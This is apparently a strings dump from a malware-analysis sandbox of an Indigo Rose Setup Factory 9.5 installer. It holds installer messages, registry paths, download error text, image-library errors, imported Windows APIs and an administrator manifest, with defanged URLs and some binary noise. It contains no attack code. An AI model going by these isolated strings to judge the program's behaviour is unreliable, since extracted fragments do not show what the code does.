Existing uninstall executable is newer. Will not overwrite.
Compared uninstall file versions. New: %s Old: %s Result: %d
Uninstall executable already exists: %s
MSG_PROG_UNINSTALL_CREATEEXE
@MSG_PROG_UNINSTALL_CREATEDATFILE
MSG_PROG_UNINSTALL_CREATEFOLDER
"/U:%s"
MSG_PROG_UNINSTALL_CREATESC
Create uninstall CP entry key
ERR_CREATEUNINSTALL_CREATEREGKEY
"%s",%d
Uninstall CP entry: URLUpdateInfo =
URLUpdateInfo
Uninstall CP entry: URLInfoAbout =
URLInfoAbout
"%s" "/U:%s"
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
MSG_PROG_UNINSTALL_CREATECPENTRY
MSG_PROG_UNINSTALL_COPYSUPPORTFILES
MSG_PROG_UNINSTALL_COPYPLUGINS
%s %s
MSG_REQUIRED_DRIVE
MSG_AVAILABLE_DRIVE
Dependency Detection Passed
MSG_PROG_CHECKING_DRIVESPACE
MSG_PROG_CHECKING_FILES
%A, %B %d, %Y
[%s] %s
%m/%d/%Y %H:%M:%S
MsgFile
ERR_MSI_PATCH_REMOVAL_UNSUPPORTED
ERR_MSI_PATCH_PACKAGE_UNSUPPORTED
ERR_MSI_INSTALL_PLATFORM_UNSUPPORTED
ERR_MSI_UNSUPPORTED_TYPE
ERR_MSI_INSTALL_LANGUAGE_UNSUPPORTED
ERR_SERVER_FILE_DOWNLOAD_SET_PROXY_PASSWORD
ERR_SERVER_FILE_DOWNLOAD_OPEN_FTP_FILE
ERR_SERVER_FILE_DOWNLOAD_OPEN_HTTP_FILE
ERR_ODBC_INVALID_KEYWORD_VALUE
ERR_WEB_503
ERR_WEB_500
ERR_WEB_404
ERR_WEB_403
ERR_WEB_400
ERR_WEB_SET_PROXY_PASSWORD
ERR_WEB_SET_PROXY_USERNAME
ERR_WEB_WRITE_MEMORY
ERR_WEB_FTP_FILE_OPEN
ERR_WEB_USER_ABORT
ERR_WEB_FILE_WRITE
ERR_WEB_DOWNLOAD_FILE_ERROR
ERR_WEB_INVALID_HTTP_RESPONSE
ERR_WEB_DESTINATION_FILE_OPEN
ERR_WEB_SEND_REQUEST
ERR_WEB_OPEN_REQUEST
ERR_WEB_CREATE_HTTP_CONNECTION
ERR_WEB_CREATE_INTERNET_SESSION
ERR_REG_GET_SUB_KEY_NAME
ERR_REG_NON_EXISTANT_SUB_KEY
ERR_REG_DELETE_KEY
ERR_REG_CREATE_KEY
ERR_FILE_EXECUTION_FAILED_ELEVATION
ERR_KEY_RUN_ON_REBOOT_FAILED
ERR_USER_ABORTED_OPERATION
ERR_NON_EXISTANT_VIEWER_EXE
ERR_FILE_EXECUTION_FAILED
ERR_SPECIFIED_EXE_FILE_INVALID
MSG_SUCCESS
Language set: Primary = %d, Secondary = %d
%CompanyURL%
%CompanyName%
UxTheme.dll
%Copyright% %CompanyName%. All rights reserved. %CompanyURL%
%TempFolder%\%ProductName% Uninstall Log.txt
%CompanyName% Support Department
%AppFolder%\uninstall.exe
uninstall.xml
CWebBrowser2
Confirm Operation
KERNEL32.DLL
PSAPI.DLL
Kernel32.dll
WS2_32.DLL
Copying "%s"
"%s" %s
%d.%d.%d.%d
\StringFileInfo\xx\ProductVersion
\StringFileInfo\xx\PrivateBuild
Sfc.dll
.bak%d
Windows ME
Windows 98
Windows 95
Windows 2000
Windows NT 4
Windows NT 3
%s\shell\open\command
NUL=%s
Software\Microsoft\Windows NT\CurrentVersion\Fonts
Software\Microsoft\Windows\CurrentVersion\Fonts
***!!!***@@
Advapi32.dll
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
%s\%s.url
%s\%s.pif
srclient.dll
%s_%d
%s\_ir_tmpfnt_%d
/\:*?"<>|
%%x
d:d
WinINet.dll
Could not create Internet session: %u
Error downloading file: %u
Error writing the destination file: %d-%u
Could not create HTTP connection: %u
Could not create HTTP connection
Incorrect HTTP status returned by server: %d
Send request failed: %u
Content-Type: application/x-www-form-urlencoded
Could not open HTTP file: %s
PTF://
hXXps://
hXXp://
%s; DIRECT
jsproxy.dll
DetectAutoProxyUrl
wininet.dll
Could not HTTP file: %u
MSG_STATUS_HANDLE_CREATED
MSG_STATUS_HANDLE_CLOSING
MSG_STATUS_REQUEST_COMPLETE
MSG_REDIRECTING
MSG_CONNECTION_CLOSED
MSG_RESOLVING_HOST_NAME
MSG_HOST_NAME_RESOLVED
MSG_CONNECTING_TO_SERVER
MSG_CONNECTED_TO_SERVER
MSG_CLOSING_CONNECTION
MSG: %d
TRACE: LastError = %d ("%s")
Script: %s, %s
Script: %s, Line %d
All Files (*.*)|*.*|
PasswordInput
MSG_MOVING
MSG_COPYING
MSG_FROM
MSG_TO
MSG_DELETING
MSG_SEARCHING
\StringFileInfo\xx\SpecialBuild
\StringFileInfo\xx\OriginalFilename
\StringFileInfo\xx\Comments
\StringFileInfo\xx\LegalTrademarks
\StringFileInfo\xx\LegalCopyright
\StringFileInfo\xx\ProductName
\StringFileInfo\xx\InternalName
\StringFileInfo\xx\FileDescription
\StringFileInfo\xx\CompanyName
ErrorMsg
%Y-%m-%dT%H:%M:%S
MSG_INSTALL_DO_YOU_WANT_OVERWRITE
MSG_INSTALL_ALWAYS_ASK_OVERWRITE_MSG
MSG_INSTALL_FILE_OLDER_MSG
OpenURL
\msiexec.exe
RunMsiexec
SQLInstallerError
SQLRemoveDriverManager
odbccp32.dll
SQLConfigDataSource
SQLInstallDriverEx
SQLInstallDriverManager
SQLRemoveDriver
\Kernel32.dll
GetKeyNames
DoesKeyExist
DeleteKey
CreateKey
ShortcutKey
keycode
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
MSG_SIZE_BYTES
P?MSG_SIZE_KILOBYTES
>MSG_SIZE_GIGABYTES
xxxxxx
%s-%s-%s
%s/%s/%s
%s:%s:%s
%d:%s:%s AM
%d:%s:%s PM
MSG_REBOOT_FAILED
WININET.DLL
PPassword
Password
%s %s %s %s (%0.2f %s)
%0.1f %s/%0.1f %s
%I64u %s/%I64u %s
MSG_KB_PER_SEC
MSG_ESTIMATED_TIME_LEFT
MSG_SAVING
MSG_DOWNLOADING
%s %s %s %s
MSG_QUERYING_INTERNET
MSG_READING
GetHTTPErrorInfo
%s > %s
number e_CtrlID, number e_MsgID, table e_Details
Removed: %s
local e_CtrlID=%d; local e_MsgID=%d;
Button%d
Check%d
ComboBox%d
Edit%d
Space available on selected drive: %SpaceAvailable%
Space required: %SpaceRequired%
Error: The specified file: '%s' could not be found.
Error: The specified file: '%s' could not be opened.
Error: The specified file: '%s' is too large to read.
Error: The specified file: '%s' could not be read.
Application.Exit();
Screen.Next();
Screen.Back();
Radio%d
Total space required: %SpaceRequired%
IDS_CTRL_CHECK_BOX_d
IDS_CTRL_BUTTON_d
IDS_CTRL_STATICTEXT_LABEL_d
IDS_CTRL_COMBOBOX_d_DEFAULT
IDS_CTRL_EDIT_d
IDS_CTRL_RADIO_BUTTON_d
IDS_CTRL_LISTBOX_d
IDS_CTRL_SCROLLTEXT_BODY_d
IDS_CTRL_PROGRESS_BAR_d
IDS_CTRL_GROUP_BOX_d
IDS_CTRL_SELECT_PACKAGE_TREE_d
IDS_CTRL_BILLBOARD_d
CTRL_CHECK_BOX_d
CTRL_BUTTON_d
CTRL_STATICTEXT_LABEL_d
CTRL_COMBOBOX_d
CTRL_EDIT_d
CTRL_RADIO_BUTTON_d
CTRL_LIST_BOX_d
CTRL_SCROLLTEXT_BODY_d
CTRL_PROGRESS_BAR_d
CTRL_GROUP_BOX_d
CTRL_SELECT_PACKAGE_TREE_d
CTRL_BILLBOARD_d
IDS_CTRL_COMBOBOX_d_ITEMS
IDS_CTRL_SCROLLTEXT_FILE_d
WebWindow
IDS_CTRL_CATEGORY_NAME_d_%.3d
IDS_CTRL_CATEGORY_DESCRIPTION_d_%.3d
hXXp://VVV.indigorose.com/route.php?pid=suf9buy
[email protected]
.tiff
.jpeg
.wbmp
CNotSupportedException
user32.dll
Afx:%p:%x:%p:%p:%p
Afx:%p:%x
commctrl_DragListMsg
CCmdTarget
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filecore.cpp
comctl32.dll
comdlg32.dll
shell32.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_s.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winfrm.cpp
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Software\Microsoft\Windows\CurrentVersion\Policies\Network
Software\Microsoft\Windows\CurrentVersion\Policies\Comdlg32
%s%s.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appcore.cpp
lX-X-x-XX-XXXXXX
RegOpenKeyTransactedA
RegCreateKeyTransactedA
RegDeleteKeyTransactedA
CHttpConnection
CHttpFile
HTTP/1.0
msctls_hotkey32
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winctrl2.cpp
mfcm100.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp
Shell32.dll
%s:%x:%x:%x:%x
RegDeleteKeyExA
lXXxXXXXXXXX
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filetxt.cpp
ole32.dll
MFCLink_UrlPrefix
MFCLink_Url
CMDITabProxyWnd
CMDIChildWndEx
CMDIFrameWndEx
%sMFCToolBar-%d%x
%sMFCToolBar-%d
%sMFCToolBarParameters
TOOLBAR_RESETKEYBAORD
KeyboardManager
MSG_CHECKEMPTYMINIFRAME
%sDockingManager-%d
&%d %s
Hex={X,X,X}
ShowCmd
CMDIChildWnd
CMDIFrameWnd
CMDIClientAreaWnd
%sMDIClientArea-%d
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\viewcore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oleipfrm.cpp
%sBasePane-%d%x
%sBasePane-%d
%sPane-%d%x
%sPane-%d
%sMFCOutlookBar-%d%x
%sMFCOutlookBar-%d
%c%d%c%s
RGB(%d, %d, %d)
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olestrm.cpp
%sDockablePaneAdapter-%d%x
%sDockablePaneAdapter-%d
ENABLE_KEYS
KEYS_MENU
KEYS
windows
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledrop2.cpp
CMFCToolBarsKeyboardPropertyPage
%sMFCTasksPane-%d%x
%sMFCTasksPane-%d
Visual C   CRT: Not enough memory to complete call to strerror.
Broken pipe
Inappropriate I/O control operation
Operation not permitted
operator
GetProcessWindowStation
IS 5.0.2.4
Error %d in %s (%s)
Error %d in %s (%s) [%s]
C.o.p.y.r.i.g.h.t...2.0.1.0.
ISLib PNG Error : %s
1.2.22
ISLib JPG Error : %s
DIBToHBITMAP error: GetLastError = %d
read %d. layersLen %d
Reading PCD sub-image #%d (%d x %d)
.cals
Keywords
SetWinMetaFileBits failed GetLastError = %d
GeoKeyDirectory
%s: Invalid InkNames value; expecting %d names, found %d
%s: Bad value %u for "%s" tag
%s: Invalid %stag "%s" (not supported by codec)
%s: Bad field type %d for "%s"
%s: Failed to allocate space for list of custom values
%s: Bad value %d for "%s" tag
%s: Sorry, cannot nest SubIFDs
Nonstandard tile width %d, convert file
Nonstandard tile length %d, convert file
%s: Cannot modify tag "%s" while writing
%s: Unknown %stag %u
%s: Error fetching directory link
%s: Error fetching directory count
Sorry, can not handle images with %d-bit samples
Sorry, LogL data must have %s=%d
Sorry, can not handle LogLuv images with %s=%d
Sorry, LogLuv data must have %s=%d or %d
Sorry, can not handle image with %s=%d
Sorry, can not handle contiguous data with %s=%d, and %s=%d and Bits/Sample=%d
Sorry, can not handle RGB image with %s=%d
Sorry, can not handle contiguous data with %s=%d, and %s=%d
Sorry, can not handle separated image with %s=%d
Missing needed %s tag
No space %s
%s: Read error at scanline %lu, strip %lu; got %lu bytes, expected %lu
%s: Read error at scanline %lu; got %lu bytes, expected %lu
%s: Seek error at scanline %lu, strip %lu
%s: Read error at row %ld, col %ld, tile %ld; got %lu bytes, expected %lu
%s: Read error at row %ld, col %ld; got %lu bytes, expected %lu
%s: Seek error at row %ld, col %ld, tile %ld
%s: No space for data buffer at scanline %ld
%s: Data buffer too small to hold strip %lu
%s: Read error on strip %lu; got %lu bytes, expected %lu
%s: Invalid strip byte count %lu, strip %lu
%s: Data buffer too small to hold tile %ld
"%s": Bad mode
Not a TIFF file, bad version number %d (0x%x)
This is a BigTIFF file. This format not supported
Not a TIFF or MDI file, bad magic number %d (0x%x)
%s: Out of memory (TIFF structure)
Error writing data for field "%s"
%s: Error writing SubIFD directory link
M"%s": Information lost writing value (%g) as (unsigned) RATIONAL
Integer overflow in %s
LIBTIFF, Version 3.9.1
0123456789ABCDEFlibpng error: %s
libpng error: %s, offset=%d
libpng error no. %s: %s
libpng warning: %s
libpng warning no. %s: %s
1.2.3
NULL row buffer for row %ld, pass %d
iTXt chunk not supported.
Corrupt JPEG data: found marker 0xx instead of RST%d
Warning: unknown JFIF revision number %d.d
Corrupt JPEG data: %u extraneous bytes before marker 0xx
Inconsistent progression sequence for component %d coefficient %d
Unknown Adobe color transform code %d
Obtained XMS handle %u
Freed XMS handle %u
Unrecognized component IDs %d %d %d, assuming YCbCr
JFIF extension marker: RGB thumbnail image, length %u
JFIF extension marker: palette thumbnail image, length %u
JFIF extension marker: JPEG-compressed thumbnail image, length %u
Opened temporary file %s
Closed temporary file %s
Ss=%d, Se=%d, Ah=%d, Al=%d
Component %d: dc=%d ac=%d
Start Of Scan: %d components
Component %d: %dhx%dv q=%d
Start Of Frame 0xx: width=%u, height=%u, components=%d
Smoothing not supported with nonstandard sampling ratios
RST%d
At marker 0xx, recovery action %d
Selected %d colors for quantization
Quantizing to %d colors
Quantizing to %d = %d*%d*%d colors
%4u %4u %4u %4u %4u %4u %4u %4u
Unexpected marker 0xx
Miscellaneous marker 0xx, length %u
with %d x %d thumbnail image
JFIF extension marker: type 0xx, length %u
Warning: thumbnail image size does not match data length %u
JFIF APP0 marker: version %d.d, density %dx%d %d
= = = = = = = =
Obtained EMS handle %u
Freed EMS handle %u
Define Restart Interval %u
Define Quantization Table %d precision %d
Define Huffman Table 0xx
Define Arithmetic Table 0xx: 0xx
Unknown APP14 marker (not Adobe), length %u
Unknown APP0 marker (not JFIF), length %u
Adobe APP14 marker: version %d, flags 0xx 0xx, transform %d
Unsupported marker type 0xx
Failed to create temporary file %s
Unsupported JPEG process: SOF type 0xx
Cannot quantize to more than %d colors
Cannot quantize to fewer than %d colors
Cannot quantize more than %d color components
Insufficient memory (case %d)
Not a JPEG file: starts with 0xx 0xx
Quantization table 0xx was not defined
Huffman table 0xx was not defined
Backing store not supported
Cannot transcode due to multiple use of quantization table %d
Maximum supported image dimension is %u pixels
Empty JPEG image (DNL not supported)
Bogus DQT index %d
Bogus DHT index %d
Bogus DAC value 0x%x
Bogus DAC index %d
Unsupported color conversion request
Too many color components: %d, max %d
Buffer passed to JPEG library is too small
JPEG parameter struct mismatch: library thinks size is %u, caller expects %u
Improper call to JPEG library in state %d
Invalid scan script at entry %d
Invalid progressive parameters at scan script entry %d
Invalid progressive parameters Ss=%d Se=%d Ah=%d Al=%d
Unsupported JPEG data precision %d
Invalid memory pool code %d
Wrong JPEG library version: library is %d, caller expects %d
IDCT output block size %d not supported
Invalid component ID %d in SOS
Bogus message code %d
Found bad IPTC data resource (len exceeds block end). ID=%d
ExifInteroperabilityOffset
InteroperabilityVersion
InteroperabilityIndex
AsShotPreProfileMatrix
AsShotICCProfile
AsShotWhiteXY
AsShotNeutral
InteroperabilityIFDOffset
Internal error, unknown tag 0x%x
Tag %d
Compression algorithm does not support random access
Compression scheme %u %s encoding is not implemented
%s %s encoding is not implemented
Compression scheme %u %s decoding is not implemented
%s %s decoding is not implemented
%s: Cannot determine size of unknown tag type %d
%s: TIFF directory is missing required "%s" field
incorrect count for field "%s" (%u, expecting %u); tag trimmed
incorrect count for field "%s" (%u, expecting %u); tag ignored
%s: Can not read TIFF directory
%s: Can not read TIFF directory count
%s: Seek error accessing TIFF directory
Error fetching data for field "%s"
%s: Rational with zero denominator (num = %u)
unexpected count for field "%s", %u, expected 2; ignored
cannot read TIFF_ANY type %d for field "%s"
Cannot handle different per-sample values for field "%s"
%s: cannot handle zero strip size
%s: cannot handle zero tile size
%s: cannot handle zero scanline size
%s: Wrong "%s" field, ignoring and calculating from imagelength
%s: Bogus "%s" field, ignoring and calculating from imagelength
%s: TIFF directory is missing required "%s" field, calculating from imagelength
%s: cannot handle zero number of %s
%s: wrong data type %d for "%s"; tag ignored
Registering anonymous field with tag %d (0x%x) failed
%s: unknown field with tag %d (0x%x) encountered
%s: invalid TIFF directory; tags are not sorted in ascending order
%s: Failed to read directory at offset %u
Unknown zTXt compression type %d
Incomplete compressed datastream in %s chunk
Data error in compressed datastream in %s chunk
Buffer error in compressed datastream in %s chunk
gamma = (%d/100000)
gx=%f, gy=%f, bx=%f, by=%f
wx=%f, wy=%f, rx=%f, ry=%f
incorrect gamma=(%d/100000)
deflate 1.2.3 Copyright 1995-2003 Jean-loup Gailly
%ld%c
%s compression support is not configured
inflate 1.2.3 Copyright 1995-2005 Mark Adler
LogL16Decode: Not enough data at row %d (short %d pixels)
LogLuvDecode24: Not enough data at row %d (short %d pixels)
LogLuvDecode32: Not enough data at row %d (short %d pixels)
?%s: No space for SGILog translation buffer
No support for converting user data format to LogL
No support for converting user data format to LogLuv
Inappropriate photometric interpretation %d for SGILog compression; %s
SGILog compression supported only for %s, or raw data
Unknown data format %d for LogLuv compression
Unknown encoding %d for LogLuv compression
%s: No space for LogLuv state block
?PixarLog compression can't handle bits depth/data format combination (depth: %d)
%d bit input not supported in PixarLog
PixarLogDecode: unsupported bits/sample: %d
%s: stride %d is not a multiple of sample count, %d, data truncated.
%s: zlib error: %s
%s: Not enough data at scanline %d (short %d bytes)
%s: Decoding error at scanline %d, %s
PixarLog compression can't handle %d bit linear encodings
A%s: Encoder error: %s
%s: Bad code word at line %u of %s %u (x %u)
%s: Uncompressed data (not supported) at line %u of %s %u (x %u)
%s: %s at line %u of %s %u (got %u, expected %u)
%s: Premature EOF at line %u of %s %u (x %u)
%s: No space for Group 3/4 reference line
@ Fax DCS: %s
Fax SubAddress: %s
(%u = 0x%x)
%sEOL padding
%s2-d encoding
%suncompressed data
%s: No space for state block
JpegRestartInterval: %u
JpegProc: %u
OJPEG encoding not supported; use new-style JPEG compression instead
Unknown marker type %d in JPEG data
Subsampling values [%d,%d] are not allowed in TIFF
Subsampling inside JPEG data does not match subsampling tag values [%d,%d] (nor any other values allowed in TIFF); assuming subsampling inside JPEG data is correct and desubsampling inside JPEG decompression
Subsampling inside JPEG data [%d,%d] does not match subsampling tag values [%d,%d]; assuming subsampling inside JPEG data is correct
Subsampling tag is not set, yet subsampling inside JPEG data [%d,%d] does not match default values [2,2]; assuming subsampling inside JPEG data is correct
SamplesPerPixel %d not supported for this compression scheme
JPEG strip/tile size exceeds expected dimensions, expected %dx%d, got %dx%d
Decompressor will try reading with sampling %d,%d.
Improper JPEG sampling factors %d,%d
Apparently should be %d,%d.
Improper JPEG strip/tile size, expected %dx%d, got %dx%d
RowsPerStrip must be multiple of %d for JPEG
JPEG tile width must be multiple of %d
JPEG tile height must be multiple of %d
BitsPerSample %d not allowed for JPEG
PhotometricInterpretation %d not allowed for JPEG
ThunderDecode: %s data at scanline %ld (%lu != %lu)
LZWDecode: Bogus encoding, loop in the code table; scanline %d
LZWDecode: Not enough data at scanline %d (short %ld bytes)
LZWDecode: Wrong length of decoded string: data probably corrupted at scanline %d
LZWDecode: Corrupted LZW table at scanline %d
LZWDecode: Strip %d not terminated with EOI code
LZWDecodeCompat: Corrupted LZW table at scanline %d
LZWDecodeCompat: Wrong length of decoded string: data probably corrupted at scanline %d
LZWDecodeCompat: Not enough data at scanline %d (short %ld bytes)
DumpModeDecode: Not enough data for scanline %d
Horizontal differencing "Predictor" not supported with %d-bit samples
Floating point "Predictor" not supported with %d data format
"Predictor" value %d not supported
Out of memory allocating %d byte temp buffer.
%u (0x%x)
WindowsForms
NTDLL.DLL
COMCTL32.DLL
USER32.DLL
MSCTF.DLL
GDI32.DLL
SHLWAPI.DLL
UXTHEME.DLL
API-MS-WIN-CORE-LIBRARYLOADER-L1-1-0.DLL
LEFTPRESSED
ALWAYSSHOWSIZINGBAR
MSGBOXFONT
%[^,], %ld, %s
User32.dll
msimg32.dll
windows-1254
windows-874
SUBLANG_PORTUGUESE_BRAZILIAN
Portuguese (Brazil)
SUBLANG_PORTUGUESE
LANG_PORTUGUESE
Portuguese (Portugal)
windows-1255
windows-1257
windows-1253
windows-1252
windows-1250
windows-1256
windows-1251
1.2.40
deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly
WININET.dll
?#%X.y
InternetCrackUrlA
InternetCanonicalizeUrlA
HttpQueryInfoA
HttpSendRequestA
HttpOpenRequestA
.?AVCCmdTarget@@
.PAVCException@@
.PAVCFileException@@
.PAVCMemoryException@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDPAVCISImageEx@@PAV3@@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDVCRect@@AAV3@@@
.?AVCMainWindowSettings@@
.?AVCMD5@@
.?AVCPasswordData@@
.?AVCRTSessionVarMgr@@
.?AVCScreenCrtrMeasure@@
.?AVCWebBrowser2@@
.PAVCInternetException@@
.PAVCResourceException@@
.?AVCScreenCtrlMsg@@
.?AVCScreenCtrlMsgDetail@@
.PAVCThreadException@IR@@
.PAVCObject@@
.PAVCOleException@@
.PAVCSimpleException@@
.PAVCNotSupportedException@@
.PAVCInvalidArgException@@
.?AVCNotSupportedException@@
.PAVCArchiveException@@
.PAVCUserException@@
.?AVCTestCmdUI@@
.?AVCCmdUI@@
.?AVCHttpConnection@@
.?AVCHttpFile@@
.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0BAA@@ATL@@
.?AV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDV12@PBD@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDPAVCDocument@@PAV3@@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBD_N_N@@
.?AV?$CMap@PAVCDocument@@PAV1@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBD@@
.PAVCOleDispatchException@@
.?AVCMDITabProxyWnd@@
.?AVCMDIChildWndEx@@
.?AVCMDIChildWnd@@
.?AVCMDIFrameWndEx@@
.?AVCMDIFrameWnd@@
.?AVCMFCToolBarCmdUI@@
.?AVCMFCAcceleratorKey@@
.?AVCMFCColorBarCmdUI@@
.?AV?$CMap@KKV?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBD@@
.?AV?$CList@PAVCMDIChildWndEx@@PAV1@@@
.?AVCMDIClientAreaWnd@@
.?AVCMFCRibbonCmdUI@@
.?AVCMFCCmdUsageCount@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDPAVCObList@@PAV3@@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDHH@@
.?AVCMFCRibbonKeyTip@@
.?AVCMFCToolBarsKeyboardPropertyPage@@
.?AVCMFCTasksPaneToolBarCmdUI@@
.?AVCMFCAcceleratorKeyAssignCtrl@@
zcÁ
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\_ir_sf_temp_0\irsetup.exe
GetProcessHeap
GetCPInfo
GetWindowsDirectoryA
RegCloseKey
RegOpenKeyExA
RegCreateKeyExA
RegEnumKeyA
RegEnumKeyExA
RegQueryInfoKeyA
RegDeleteKeyA
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GetViewportOrgEx
GetViewportExtEx
GdiplusShutdown
ShellExecuteExA
ShellExecuteA
UrlUnescapeA
URLDownloadToFileA
MapVirtualKeyExA
GetKeyboardState
GetKeyboardLayout
MapVirtualKeyA
GetKeyNameTextA
SetWindowsHookExA
UnhookWindowsHookEx
CreateDialogIndirectParamA
GetKeyState
ExitWindowsEx
EnumWindows
MsgWaitForMultipleObjects
GetAsyncKeyState
|5#" " " 
# # #""%"$
^)1-"*"<.
2;%SK
%.Fh3>$]R
]<%XZ
WEBI
]>2?>2/"
H%FZW
|@@@@8>-
\ ,%X
[9<;.MK31?MM&
!3-%#;3&1
##0#3131%& 
.QICN,1#-#5<## @I3>##Jl;>C3I=I6lIC6&-4-350T-3]
$&%f#F>#
:0@033*00
$,0($,$4
(,,4,4,$
0488<<<( 0
.text
`.rdata
@.data
.rsrc
@.reloc
%xERRj3cqZQ
! !!####0
;;;9551%%0
! !!565665@
version="9.5.0.0"
name="setup.exe"/>
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
<requestedExecutionLevel level="requireAdministrator" uiAccess="false"/>
<!-- Windows Vista Support -->
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<!-- Windows 7 Support -->
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
<!-- Windows 8 Support -->
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>
<!-- Windows 8.1 Support -->
<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>
<!-- Windows 10 Support -->
<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>
ADVAPI32.dll
COMCTL32.dll
COMDLG32.dll
GDI32.dll
gdiplus.dll
imagehlp.dll
IMM32.dll
MSIMG32.dll
NETAPI32.dll
OLEACC.dll
OLEAUT32.dll
oledlg.dll
SHELL32.dll
SHLWAPI.dll
urlmon.dll
USER32.dll
VERSION.dll
WINMM.dll
WINSPOOL.DRV
accKeyboardShortcut
hhctrl.ocx
VWININET.DLL
dwmapi.dll
xUxTheme.dll
yDWrite.dll
D2D1.dll
SHELL32.DLL
ZRICHED20.DLL
mscoree.dll
ekernel32.dll
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
aero.msstyles
winxp.royale.cjstyles
royale.msstyles
winxp.luna.cjstyles
luna.msstyles
Argument %d must be of type %s.
%d arguments required.
All Files (*.*)
No error message is available.#Attempted an unsupported operation.$A required resource was unavailable.
Command failed.)Insufficient memory to perform operation.PSystem registry entries have been removed and the INI file (if any) was deleted.BNot all of the system registry entries (or INI file) were removed.FThis program requires the file %s, which was not found on this system.tThis program is linked to the missing export %s in the file %s. This machine may have an incompatible version of %s.
Destination disk drive is full.5Unable to read from %1, it is opened by someone else.AUnable to write to %1, it is read-only or opened by someone else.1Encountered an unexpected error while reading %1.1Encountered an unexpected error while writing %1.
#Unable to load mail system support.
Note that if you choose to recover the auto-saved documents, you must explicitly save them to overwrite the original documents. If you choose to not recover the auto-saved versions, they will be deleted.fRecover the auto-saved documents
%s [Recovered]
9.5.0.0
2015 Indigo Rose Corporation (VVV.indigorose.com)
suf_rt.exe

irsetup.exe_484_rwx_00401000_003DD000:

t%SSSS
9=@%u
SSSSh
t%SWV
u)SSh
u)SShd
TSShX
@ SSh
u%SSSV
SSShT
SSSh`
9^$u&SSSSh?
9^$u SSSSh?
9^$u)SSSSh?
|SShF
t2SSh
Ht.Ht S
FLSSh
NLhD%u
GLSSh
GXSSh
FpSSh
FtSSh
G`SSh
.WWWW
Nt.Nt
t'SShl
u$SShe
@ SSHPWj
tFHt:Ht.Ht"Hu`
tWSShW
tl9_ tgSSh
tAHt.HHt
j%XtL9E
<SShG
FtPW
SSh@B
FTCP
u.Ph,
.FG;}
FTPQ
FTPh
V SShW
O SSh
O SSh,
kernel32.dll
%s (%s:%d)
c:\Program Files\Microsoft Visual Studio 10.0\VC\atlmfc\include\afxwin1.inl
MSG_ERROR
%s %d. %s
MSG_ASK_FOR_DISK
MSG_NEW_LOCATION
MSG_CONFIRM_ABORT
MSG_CONFIRM
A%s%s%s.%d
%s.%d
%s, Line %d: %s
File condition evaluation for file "%s"
msi.dll
\msi.dll
Software\Microsoft\Windows\CurrentVersion\Installer
C:\temp\SUF_SFX_TEST\
MSG_INITIALIZING
16670749
_IgnoreInvalidCertificate
SetEntriesInAcl Error %u
SetNamedSecurityInfo Error %u
*.gif
*.tif
*.tga
*.png
*.pcx
*.jpg
*.bmp
[%d]: %s
*** LOCATION: %s
__NOREPORT__
in function <%s:%d>
in function '%s'
Line: %d
%d: [%s]
Script: %s, %s (%s)
__ir_eval_value = %s;
c:\Program Files\Microsoft Visual Studio 10.0\VC\atlmfc\include\afxwin2.inl
%Copyright%. All rights reserved. %CompanyURL%
WindowStyle
MainWindowSettings
%s at offset %d unterminated
Incorrect %s at offset %d
Element '%s' at offset %d not ended
End tag '%s' at offset %d does not match start tag '%s' at offset %d
No start tag for end tag '%s' at offset %d
%s%d bytes
%s%d wide chars to %d bytes
%d bytes to %s%d wide chars
MSG_SEARCH_FILE
(*.*)|*.*||
MSG_SEARCH_ALL
MSG_SEARCH_MASK
MSG_INSERTDISK
MSG_CANCEL
MSG_OK
MSG_BROWSE
MSG_PATH
Windows Server 10
Windows 10
Windows Server 2012 R2
